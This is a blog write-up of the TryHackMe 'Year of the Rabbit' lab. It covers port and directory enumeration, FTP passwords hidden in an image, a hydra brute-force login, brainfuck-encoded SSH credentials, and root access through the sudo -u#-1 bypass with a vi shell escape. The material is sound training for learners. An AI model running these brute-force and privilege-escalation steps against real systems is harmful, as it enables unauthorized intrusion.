TryHackMe: Year of the Rabbit
Year of the Rabbit humbled me. I was feeling great with the rooms i was doing, but this one was though, felt demotivated but took a break to calm down and think of what to do next, and it worked, there is no rush in learning, good things come with time.
https://tryhackme.com/room/yearoftherabbit
Initial Enumeration
Nmap Scan
We start with our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.73.92
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 15:16 GMT
Nmap scan report for 10.10.73.92
Host is up (0.061s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.10 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.59 seconds
Web 80
Can’t do much on ftp yet, so we proceed to port 80:
Gobuster Scan
Nothing to see so we do our gobuster scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.73.92
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.73.92
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
...
/assets (Status: 301) [Size: 311] [--> http://10.10.73.92/assets/]
/index.html (Status: 200) [Size: 7853]
/index.html (Status: 200) [Size: 7853]
/server-status (Status: 403) [Size: 276]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
We don’t find much but see an assets directory with 2 files inside:
Checking the css file, we find the following:
A php page that, when navigated to gives us a message:
If we press ok without disabling javascript it will redirect us to the Rick Roll Youtube video, so to get around this, we will use the NoScript extension for firefox. All we have to do is download it and enable restrictions:
And with that, we should be able to see the page:
After listening to the music for a bit, there’s a voice somewhere around 1-2 minutes saying that this is not the correct path.
Not many options left, but our best choice for right now will be using Burp Suite and going around the pages we already have found to see if we can get anything. And sure enough, we find one interesting request:
It contains yet another directory that, when navigated to, had only a single png file`:
After downloading the file and doing a simple strings on it, we find the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Desktop]
└─$ strings Hot_Babe.png
...
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
...
All we have to do now is put the passwords in a file and brute force into ftp with hydra:
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -l ftpuser -P list 10.10.73.92 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 15:40:06
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.73.92:21/
[21][ftp] host: 10.10.73.92 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 15:40:21
FTP
Now we can log in into ftp, and inside we find a txt file, so we download it with the get command:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.73.92
Connected to 10.10.73.92.
220 (vsFTPd 3.0.2)
Name (10.10.73.92:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50930|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
229 Entering Extended Passive Mode (|||19647|).
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
100% |*********************************************************************************************| 758 247.07 KiB/s 00:00 ETA
226 Transfer complete.
758 bytes received in 00:00 (12.07 KiB/s)
Shell as eli
When reading the file, we get the following:
1
2
3
4
5
6
7
8
9
10
11
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
And after some analysis, we see that its written in brainfuck, a programming language. There are websites that can translate it, so we will use one to decode it and get eli’s ssh credentials:
When logging into ssh, we see a message from Root to Gwendoline:
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh eli@10.10.73.92
eli@10.10.73.92's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
eli@year-of-the-rabbit:~$
Shell as gwendoline
To find the s3cr3t hiding place they are talking about, assuming its a directory, we can use the locate command:
1
2
3
4
eli@year-of-the-rabbit:/usr/share$ locate s3cr3t
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php
We see an interesting hidden file, so we can try to read it:
1
2
3
4
5
6
7
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
And we got gwedonline password, since eli didn’t have much more to look at, we can switch to gwendolin and get the user flag:
1
2
3
4
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ cat ~/user.txt
THM{REDACTED}
Shell as root
While enumerating, doing sudo -l we see that we have sudo permissions to run the binary vi in the /home/gwendoline/user.txt file:
1
2
3
4
5
6
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
This allows us to run external commands inside the user.txt, but we can’t run it as root yet so first we need to search for ways around it, and we can find one inside another room on TryHackMe called Sudo Security Bypass:
This only works for sudo versions under 1.8.28.
Looking at GTFOBins we find the vi binary, so now all we need to do is run the following:
1
gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
And inside, we just enter:
1
:!/bin/sh
It will get us a root shell that we can then use to read the root flag:
1
2
3
4
5
6
7
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{REDACTED}